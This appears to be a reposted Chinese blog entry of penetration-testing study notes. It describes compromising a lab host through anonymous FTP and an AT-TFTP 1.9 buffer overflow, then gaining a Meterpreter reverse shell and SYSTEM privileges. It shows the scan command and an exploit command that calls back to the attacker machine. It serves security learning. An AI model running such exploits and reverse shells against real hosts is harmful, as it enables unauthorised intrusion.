博客
关于我
渗透测试学习笔记之案例五
阅读量:146 次
发布时间:2019-02-28

本文共 781 字,大约阅读时间需要 2 分钟。

0x00 前言

今天这篇文章将分享一个渗透测试中的实际案例,展示从信息收集到最终获得目标主机控制的完整过程。

0x01 案例分析

实验环境

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程

开始进行服务和端口扫描:

# nmap -sT -Pn 10.11.1.226

扫描结果显示目标主机开放了ftp和RDP服务。初步测试发现,ftp服务支持匿名登录。

通过ftp服务,我们发现并下载了一个名为servers.py的Python脚本。进一步分析发现,该脚本用于启动ftp和tftp服务,具体涉及以下操作:

# cat servers.pyimport wmi, time, ftplib, tftpy

发现tftp漏洞

通过Google搜索,我们发现AT-TFTP 1.9存在一个缓冲区溢出漏洞(RCE)。利用Meterpreter反弹shell的生成工具,替换脚本中的shellcode代码,并运行:

# python atftp.py 10.11.1.226 69 10.11.0.74 9

最终,我们成功获得了一个Meterpreter反弹shell。

通过msf的反弹shell处理程序,迁移并提权至SYSTEM权限,完成渗透目标。

0x02 小结

该案例的渗透思路总结如下:

  • 服务和端口扫描:首先发现目标主机开放了ftp服务,并进一步确认tftp服务的存在。
  • 脚本分析:通过ftp下载并分析servers.py脚本,发现其用于启动ftp和tftp服务。
  • 漏洞利用:利用AT-TFTP 1.9的缓冲区溢出漏洞,生成Meterpreter反弹shell。
  • 反弹shell提权:通过msf反弹shell迁移进程并提权至SYSTEM权限。
  • 该案例展示了如何通过合理利用现有信息和漏洞,逐步实现渗透测试的目标。

    转载地址:http://cfgc.baihongyu.com/

    你可能感兴趣的文章
    python range()函数
    查看>>
    Python rdflib可传递查询
    查看>>
    python redis 集群_python 搭建redis集群
    查看>>
    python redis连接,在Python中使用Redis连接池的正确方法
    查看>>
    python regex_Python RegEx
    查看>>
    Python Seborn绘制空白直方图
    查看>>
    Python Selenium - 获取href值
    查看>>
    Python Selenium实现自动化测试及Chrome驱动使用!
    查看>>
    Python Selenium搭建UI自动化测试框架
    查看>>
    Python Selenium模块详解
    查看>>
    Python selenium爬取影评生成词云图
    查看>>
    Python selenium自动化测试框架实战 —— 登录测试案例
    查看>>
    Python Selenium设计模式 —— POM
    查看>>
    Python Serial:如何使用 read 或 readline 函数一次读取多个字符
    查看>>
    Python set([]) 如何检查两个对象是否相等?一个对象需要定义哪些方法来自定义它?
    查看>>
    Python setup.py:数据文件无法复制目录:不存在或不是常规文件
    查看>>
    Python Shell下使用matplotlib
    查看>>
    Python Slice How-to,我知道Python Slice,但我怎么才能使用内置的Slice对象呢?
    查看>>
    Python UI自动化测试集成UnitTest
    查看>>
    Python UTC 日期时间对象的 ISO 格式不包括 Z(祖鲁语或零偏移)
    查看>>